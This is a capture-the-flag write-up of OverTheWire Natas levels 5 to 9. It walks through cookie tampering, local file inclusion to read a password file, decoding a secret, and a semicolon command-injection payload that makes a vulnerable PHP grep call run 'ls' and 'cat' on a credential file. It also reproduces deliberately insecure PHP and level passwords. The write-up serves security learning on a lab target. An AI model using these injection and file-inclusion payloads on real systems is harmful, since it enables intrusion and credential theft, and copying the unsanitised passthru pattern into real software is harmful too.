Introduction
This is the second of my writeups for OverTheWire’s Natas series of challenges. You can view the first part here.
Level 5
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Upon opening the webpage, I see the following message:
Access disallowed. You are not logged in
There was nothing in the source code so I decided to check the cookies associated with the page. On Firefox/Chrome, this can be done by using the shortcut Ctrl+Shift+I
–> Storage
–> Cookies
.
I see one cookie named loggedin
with a value of 0. From experience, I can make the assumption that 0 = False, therefore 1 would equal True. I change the value of the cookie to 1 and refreshed the page.
The text on the page now shows that I am logged in and presents the flag for the next level.
1
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Level 6
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Upon opening the webpage, I see that there is a form where I can submit a query. There is also a link to the source code for this form.
This snippet of code looks interesting.
1
2
3
4
5
6
7
8
9
10
11
12
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
It looks like the $secret
variable our input is being compared to comes from the file includes/secret.inc
. I naviagte to that web page to find the secret key.
1
2
3
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
Submitting the value of this variable on the form gives me the password for the next level.
1
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Level 7
User: Natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Upon opening the challenge, I see links to two different pages: home
and about
.
I’ll take a look at home
.
There are things that stick out right away. The first thing is that from the source code, there is an interesting HTML comment.
1
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
The second thing is from the URL of the home page.
1
http://natas7.natas.labs.overthewire.org/index.php?page=home
The ?page=
parameter shows that this is a Local File Inclusion
challenge. We can specify the path of the file we want to view, so let’s view /etc/natas_webpass/natas8
as that is where the password should be.
1
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Level 8
User: Natas8 Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
It looks like there is another form where we can submit a query. Let’s view the source code again:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
Ok, it looks like we have to enter a string that, when passed through the encodeSecret
function, equals the encodedSecret variable in the code.
Three operations are applied to it. First, it is encoded in base64. Second, the string is reversed. Finally, the bin2hex
function is used. I’m not exactly sure what this does, so I google it.
Returns an ASCII string containing the hexadecimal representation of str.
Sounds simple enough, if we pass it through a hex value -> ascii representation tool online, we should be able to undo that.
Using this tool, I was able to get the following string:
==QcCtmMml1ViV3b
Now, I’ll use this tool to reverse the string.
b3ViV1lmMmtCcQ==
Finally, I’ll base64 decode it using this tool.
We end up with oubWYf2kBq
, which when I submit as the query produces the password needed for level 9.
1
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
Level 9
User: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
We are given a form with the prompt Find words containing:
. Let’s view the source code.
1
2
3
4
5
6
7
8
9
10
11
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
So it takes whatever we put in the form and throws it into the command grep -i $key dictionary.txt
.
We can control whatever is in $key
, so we can easily abuse this form. There are several different ways to easily solve it.
I will solve it by absuing this character: ;
. A semicolon is treated like you pressing the enter key, so it starts a new command.
Knowing that, we can assemble a simple injection to run commands.
1
wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound
If we use this as our query, this is what the server will run:
1
grep -i wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound dictionary.txt
Keeping in mind the first and last commands will not return anything, the output of the command ls
is all that we will see.
This is the output:
1
2
3
4
dictionary.txt
index-source.html
index.php
index.php.tmpl
Cool! It works. Looking back at Level 7, we know that the flag for the next challenge will always be stored at /etc/natas_webpass/natas<next level>
, in this case the next level is 10, so our injection should reflect that.
1
wordthatwillnotbefound dictionary.txt; cat /etc/natas_webpass/natas10; grep -i wordthatwillnotbefound
1
2
3
Output:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
Conclusion
So far, all of the changes have been basic but I’m quickly reaching the limits of what I’ve already known/experienced and seen in previous CTFs. I’m excited to see how the next few levels will play out.